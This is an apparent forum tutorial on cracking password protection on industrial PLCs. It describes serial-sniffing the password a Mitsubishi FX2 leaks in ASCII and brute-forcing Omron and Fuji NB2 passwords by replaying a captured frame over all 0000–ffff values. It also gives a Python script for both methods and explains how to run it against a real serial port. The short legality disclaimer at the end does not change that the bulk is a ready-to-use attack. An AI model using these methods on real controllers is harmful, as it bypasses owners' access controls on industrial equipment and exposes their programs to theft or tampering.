PLC encryption technology and decryption method
PLC encryption is really just an idea in the developer's head. Once you understand how the author intended the protection to work, you can defeat it quickly. In fact, whether it is a PLC or an elevator controller board, wherever there is encryption there is a way to crack it; the two are always a pairing of spear and shield. Enough preamble, let's get to the point.
First, two PLC decryption methods are introduced: 1. the direct reading method; 2. brute-force cracking.
The direct reading method, taking the Mitsubishi FX2 as an example: first open a serial port monitoring tool (there are plenty online; here I use the serial/parallel port monitor from the forum's PLC section) to capture the data going in and out of the serial port. Then put fxwin (the PLC programming software) online with the PLC, select the model and click "read program". In the serial monitor you will now see several frames exchanged between the computer and the PLC. The last frame sent from the PLC to the computer is the password, but it is encoded as ASCII: look each byte up in the ASCII table and translate it into characters to obtain the password. This is the weakness of the Mitsubishi PLC: its programming software reads the password from the PLC into the computer's memory first and compares it there with the password the user types; if they match, it reads the program. I tried it: I sent the second-to-last captured frame to the PLC from the serial tool, and the PLC returned the password again. So now you know what a "decryption" program actually does: the whole tool only has to send one frame to the PLC and translate the password-bearing reply into characters. The same serial monitor lets you confirm whether a given model behaves this way. Some PLCs do not have this loophole, for example Omron and the Fuji NB2: they send the password the user typed to the PLC, and the PLC itself decides whether the password is correct before deciding whether the program may be read.
For those, use the second method, brute-force cracking. As before, run the serial monitor, put the programming software online, click "read program" and enter the password 1234. If the program reads, there is nothing to solve. If a password error is shown, look at the captured data and find the frame containing 1234; right after it there will be a frame returned by the PLC indicating the password error. Record that error frame. Then open VB and write a small project: have the computer send the captured frame containing 1234 to the serial port, inside a loop that replaces 1234 with every value from 0000 to ffff (65536 candidates), and after each send use an if statement to compare the reply with the recorded error frame. If the reply differs, stop: the value you just tried is the PLC's password. Two practical checks: the loop stops on any reply that differs from the error frame, including no reply at all, so confirm a hit by actually reading the program, and handle a timeout rather than treating silence as success.
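Both methods above come down to a very small program: send one captured frame and decode the reply, or replay a captured frame with the password field substituted until the reply changes. The following is an added example (not the author's VB project and not any vendor's protocol); it uses a constructed FakePLC whose frame layout ("RDPW", "AUTH xxxx", "ERR 02") is invented for the example, and the two functions accept any object with pyserial-style write()/readline() methods, so a real serial.Serial port can be passed in the same way.

```python
"""Serial-level PLC password recovery, both methods from the text.

FakePLC is a constructed stand-in for a PLC behind a serial port; the
frame formats used here are placeholders for this example, not any
vendor's real protocol. Only write()/readline() are needed from a port.
"""
import binascii
from itertools import product

HEXDIGITS = "0123456789abcdef"


class FakePLC:
    """Constructed PLC model.

    leaks_password=True models the behaviour the text describes for the
    Mitsubishi FX2: a read request is answered with the password itself,
    encoded as ASCII hex text. leaks_password=False models the Omron/Fuji
    style: the PC sends the password and the PLC answers OK or an error.
    """

    def __init__(self, password, leaks_password):
        self.password = password
        self.leaks_password = leaks_password
        self._pending = b""

    def write(self, data):
        line = data.rstrip(b"\r\n")
        if self.leaks_password and line == b"RDPW":
            # Reply carries the password as ASCII hex, e.g. '1a2b' -> b'31613262'
            self._pending = binascii.hexlify(self.password.encode()) + b"\r\n"
        elif line.startswith(b"AUTH "):
            attempt = line[len(b"AUTH "):].decode()
            self._pending = b"OK\r\n" if attempt == self.password else b"ERR 02\r\n"
        else:
            self._pending = b"ERR 01\r\n"
        return len(data)

    def readline(self):
        out, self._pending = self._pending, b""
        return out


def decode_ascii_hex(frame):
    """The 'look it up in the ASCII table' step: b'31613262' -> '1a2b'."""
    return binascii.unhexlify(frame.strip()).decode("ascii")


def direct_read(port, request=b"RDPW\r\n"):
    """Method 1: replay the captured read request and decode the reply."""
    port.write(request)
    return decode_ascii_hex(port.readline())


def brute_force(port, template=b"AUTH %s\r\n", error_response=b"ERR 02\r\n",
                length=4, max_tries=None):
    """Method 2: replay the captured frame with every password from 0000 to
    ffff and stop at the first reply that differs from the recorded error
    frame. Returns (candidate, tries); candidate is None if nothing differed.
    An empty reply (timeout) also differs, so the caller must confirm a hit."""
    tries = 0
    for digits in product(HEXDIGITS, repeat=length):
        candidate = "".join(digits)
        port.write(template % candidate.encode())
        reply = port.readline()
        tries += 1
        if reply != error_response:
            return candidate, tries
        if max_tries is not None and tries >= max_tries:
            break
    return None, tries


if __name__ == "__main__":
    leaky = FakePLC("1a2b", leaks_password=True)
    print("direct read:", direct_read(leaky))
    strict = FakePLC("00ff", leaks_password=False)
    print("brute force:", brute_force(strict))
```

With a real port the only change is the transport: open it with pyserial (serial.Serial with a read timeout set) and pass it in place of FakePLC; the captured request frame and the recorded error frame from the serial monitor become the request and error_response arguments. Because brute_force returns on any non-matching reply, treat its result as a candidate and verify it by reading the program, exactly as the text advises.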
Having read this far, do you feel that PLC encryption is nothing more than this, with a sudden sense of clarity? Congratulations: that means you have understood the principle behind encryption and decryption. There are many specific ways to implement it, but grasping the principle is what matters most and is hardest. As the saying goes, the great way has no technique, the middle way takes shape, and the small way is mere cleverness. That is all for now; some details cannot be explained fully in a short space. Try things yourself, experiment more, think more, understand more, and you will gain. If you have questions, leave me a message on the forum!
Remember, we master encryption and decryption techniques only to learn better, not for any illegal purpose. I remind you of this here so that no one comes to harm.